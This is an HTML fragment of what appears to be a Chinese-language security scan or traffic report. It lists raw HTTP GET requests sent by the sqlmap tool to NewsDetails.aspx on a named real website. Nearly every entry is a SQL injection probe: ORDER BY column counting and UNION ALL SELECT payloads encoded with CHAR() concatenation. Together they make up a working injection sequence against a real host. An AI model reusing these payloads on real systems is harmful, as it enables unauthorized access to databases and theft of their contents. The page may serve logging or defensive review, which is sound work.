        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%204143--%20yTAf&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1444-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1444-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1444-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%201--%20yjnL&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1478-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1478-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1478-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%2010--%20ului&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1533-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1533-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1533-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%205--%20TTHc&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1567-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1567-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1567-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%2878%29%2BCHAR%28106%29%2BCHAR%28102%29%2BCHAR%2873%29%2BCHAR%2876%29%2BCHAR%2871%29%2BCHAR%28119%29%2BCHAR%2876%29%2BCHAR%2878%29%2BCHAR%2873%29%2BCHAR%28122%29%2BCHAR%2867%29%2BCHAR%28104%29%2BCHAR%28105%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28102%29%2BCHAR%28100%29%2BCHAR%28118%29%2BCHAR%2873%29%2BCHAR%2885%29%2BCHAR%28121%29%2BCHAR%2868%29%2BCHAR%2874%29%2BCHAR%28110%29%2BCHAR%2882%29%2BCHAR%28109%29%2BCHAR%2873%29%2BCHAR%2877%29%2BCHAR%28115%29%2BCHAR%2878%29%2BCHAR%28104%29%2BCHAR%2879%29%2BCHAR%2870%29%2BCHAR%2890%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%2884%29%2BCHAR%28102%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20mIkz&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1590-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1590-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1590-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%2880%29%2BCHAR%28119%29%2BCHAR%2869%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%2882%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2899%29%2BCHAR%28118%29%2BCHAR%2887%29%2BCHAR%2882%29%2BCHAR%28117%29%2BCHAR%2865%29%2BCHAR%2873%29%2BCHAR%2866%29%2BCHAR%28118%29%2BCHAR%2873%29%2BCHAR%2881%29%2BCHAR%28107%29%2BCHAR%28108%29%2BCHAR%28113%29%2BCHAR%28116%29%2BCHAR%2865%29%2BCHAR%2872%29%2BCHAR%2883%29%2BCHAR%2881%29%2BCHAR%28113%29%2BCHAR%2880%29%2BCHAR%2868%29%2BCHAR%28102%29%2BCHAR%28117%29%2BCHAR%2880%29%2BCHAR%2889%29%2BCHAR%2881%29%2BCHAR%2881%29%2BCHAR%2887%29%2BCHAR%28121%29%2BCHAR%28100%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL--%20pbNA&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1544-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1544-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1544-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%2868%29%2BCHAR%2888%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%2882%29%2BCHAR%28100%29%2BCHAR%28101%29%2BCHAR%28102%29%2BCHAR%2866%29%2BCHAR%2877%29%2BCHAR%2877%29%2BCHAR%2899%29%2BCHAR%2886%29%2BCHAR%2878%29%2BCHAR%2870%29%2BCHAR%28110%29%2BCHAR%2872%29%2BCHAR%28108%29%2BCHAR%28102%29%2BCHAR%2881%29%2BCHAR%2881%29%2BCHAR%2883%29%2BCHAR%2882%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%2887%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2868%29%2BCHAR%2878%29%2BCHAR%2868%29%2BCHAR%28110%29%2BCHAR%28104%29%2BCHAR%2873%29%2BCHAR%2869%29%2BCHAR%2890%29%2BCHAR%2871%29%2BCHAR%2887%29%2BCHAR%2890%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29--%20NvEO&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1505-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1505-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1505-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20ORDER%20BY%204--%20odhZ&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1639-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1639-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1639-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28115%29%2BCHAR%2885%29%2BCHAR%2872%29%2BCHAR%2882%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2881%29%2BCHAR%2872%29%2BCHAR%28109%29%2BCHAR%2890%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29--%20KDwD&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1667-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1667-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1667-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%2884%29%2BCHAR%2890%29%2BCHAR%2884%29%2BCHAR%2889%29%2BCHAR%28110%29%2BCHAR%28104%29%2BCHAR%28110%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20VaoH&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1691-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1691-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1691-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28113%29%2BCHAR%28114%29%2BCHAR%2899%29%2BCHAR%2899%29%2BCHAR%28122%29%2BCHAR%28121%29%2BCHAR%28110%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL--%20woZS&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1614-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1614-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1614-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%2887%29%2BCHAR%2899%29%2BCHAR%28114%29%2BCHAR%28111%29%2BCHAR%28115%29%2BCHAR%28115%29%2BCHAR%28120%29%2BCHAR%2869%29%2BCHAR%2898%29%2BCHAR%2866%29%2BCHAR%2867%29%2BCHAR%2879%29%2BCHAR%2879%29%2BCHAR%28100%29%2BCHAR%28108%29%2BCHAR%28106%29%2BCHAR%2897%29%2BCHAR%2877%29%2BCHAR%2871%29%2BCHAR%28108%29%2BCHAR%2877%29%2BCHAR%28117%29%2BCHAR%28116%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%2886%29%2BCHAR%2899%29%2BCHAR%28111%29%2BCHAR%28111%29%2BCHAR%28119%29%2BCHAR%28104%29%2BCHAR%28122%29%2BCHAR%28105%29%2BCHAR%2869%29%2BCHAR%2888%29%2BCHAR%2874%29%2BCHAR%28116%29%2BCHAR%2884%29%2BCHAR%28115%29%2BCHAR%2884%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--%20ukVD&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1739-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1739-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1739-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-8542%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28117%29%2BCHAR%2880%29%2BCHAR%2887%29%2BCHAR%2876%29%2BCHAR%2886%29%2BCHAR%2872%29%2BCHAR%28106%29%2BCHAR%2868%29%2BCHAR%28119%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%2866%29%2BCHAR%2867%29%2BCHAR%2897%29%2BCHAR%2888%29%2BCHAR%2884%29%2BCHAR%28121%29%2BCHAR%2868%29%2BCHAR%2880%29%2BCHAR%28119%29%2BCHAR%2873%29%2BCHAR%28101%29%2BCHAR%28112%29%2BCHAR%2871%29%2BCHAR%28119%29%2BCHAR%2871%29%2BCHAR%28111%29%2BCHAR%28105%29%2BCHAR%2898%29%2BCHAR%28115%29%2BCHAR%28106%29%2BCHAR%2899%29%2BCHAR%28113%29%2BCHAR%28121%29%2BCHAR%28119%29%2BCHAR%2881%29%2BCHAR%28104%29%2BCHAR%28110%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20iOkt&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1793-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
